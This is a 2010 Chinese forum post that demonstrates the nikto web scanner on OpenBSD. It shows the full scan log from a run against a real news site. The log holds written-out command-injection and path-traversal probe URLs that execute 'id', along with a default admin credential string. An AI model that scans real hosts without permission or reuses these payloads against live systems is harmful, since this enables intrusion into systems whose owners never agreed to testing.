分页: 1 / 1

OpenBSD下的网站安全扫描工具——nikto

发表于 : 2010-10-19 5:09
leo

代码: 全选

# nikto -h www.sina.com.cn 
- Nikto v2.1.3
---------------------------------------------------------------------------
+ Target IP:          61.172.201.22
+ Target Hostname:    www.sina.com.cn
+ Target Port:        80
+ Start Time:         2010-10-20 08:43:40
---------------------------------------------------------------------------
+ Server: Apache/2.0.63 (Unix)
+ Server banner has changed from Apache/2.0.63 (Unix) to squid/2.6.STABLE21, this may suggest a WAF is in place
+ Retrieved x-powered-by header: mod_xlayout_jh/0.0.1vhs.markIII.remix
+ Multiple index files found (note, these may not all be unique): default.asp, index.jhtml, index.php, index.htm, index.pl, default.htm, index.aspx, default.aspx, index.asp, index.do, index.php3, index.cfm, index.cgi, index.html, index.shtml, 
+ Apache/2.0.63 appears to be outdated (current is at least Apache/2.2.16). Apache 1.3.42 and 2.0.63 are also current.
+ /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ /fcgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ /fcgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-3092: /job/: This might be interesting...
+ OSVDB-3092: /sun/: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /test.html: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3092: /exchange/: This may be interesting (Outlook exchange OWA server?)...
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /fcgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:[email protected]', password file location 'ans_data/ans.passwd'
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
+ OSVDB-3092: /tv/: This might be interesting... potential country code (Tuvalu)
+ 6417 items checked: 78 error(s) and 24 item(s) reported on remote host
+ End Time:           2010-10-20 11:04:43 (8463 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
#